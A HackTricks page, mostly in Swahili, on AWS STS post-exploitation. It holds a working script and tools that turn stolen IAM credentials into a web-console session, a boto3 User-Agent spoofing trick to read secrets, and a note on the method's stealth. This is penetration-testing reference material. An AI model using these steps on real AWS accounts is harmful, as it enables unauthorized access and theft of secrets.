AWS - STS Post Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

STS

Kwa maelezo zaidi:

AWS - IAM, Identity Center & SSO Enum

From IAM Creds to Console

Ikiwa umefanikiwa kupata baadhi ya IAM credentials unaweza kuwa na nia ya kuingia kwenye web console kwa kutumia zana zifuatazo.
Kumbuka kwamba user/role lazima iwe na ruhusa sts:GetFederationToken.

Skripti maalum

Skripti ifuatayo itatumia profile ya default na eneo la default la AWS (not gov and not cn) kukupa URL iliyosainiwa ambayo unaweza kutumia kuingia ndani ya web console:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)


# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Unaweza kutengeneza kiungo cha konsoli ya wavuti kwa kutumia https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Warning

Hakikisha mtumiaji wa IAM ana ruhusa ya sts:GetFederationToken, au mpe role ya kujichukua.

aws-vault

aws-vault ni zana ya kuhifadhi kwa usalama na kufikia AWS credentials katika mazingira ya maendeleo.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Note

Unaweza pia kutumia aws-vault kupata browser console session

From Web Console to IAM Creds

Kiendelezi cha kivinjari https://github.com/AI-redteam/clier kina uwezo wa kukamata IAM credentials kutoka kwenye network kabla hazijalindwa katika kumbukumbu za kivinjari.

Bypass User-Agent restrictions from Python

Ikiwa kuna kizuizi cha kufanya vitendo fulani kulingana na user agent inayotumika (kama kupiga marufuku matumizi ya python boto3 library kwa misingi ya user agent) inawezekana kutumia mbinu iliyotajwa hapo juu kuconnect to the web console via a browser, au unaweza moja kwa moja modify the boto3 user-agent kwa kufanya:

# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])

sts:GetFederationToken

Kwa ruhusa hii inawezekana kuunda utambulisho uliounganishwa kwa mtumiaji anayekifanya, uliokwamishwa kwa ruhusa ambazo mtumiaji huyu ana.

aws sts get-federation-token --name <username>

Token inayorudishwa na sts:GetFederationToken ni ya federated identity ya mtumiaji anayefanya mwito, lakini ina ruhusa zilizopunguzwa. Hata kama mtumiaji ana haki za administrator, vitendo vinginevyo kama kuorodhesha IAM users au kuambatanisha policies haviwezi kufanywa kupitia federated token.

Zaidi ya hayo, njia hii ni ya kimapenzi kiasi, kwani federated user haionekani kwenye AWS Portal; inaweza kuonekana tu kupitia CloudTrail logs au zana za ufuatiliaji.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.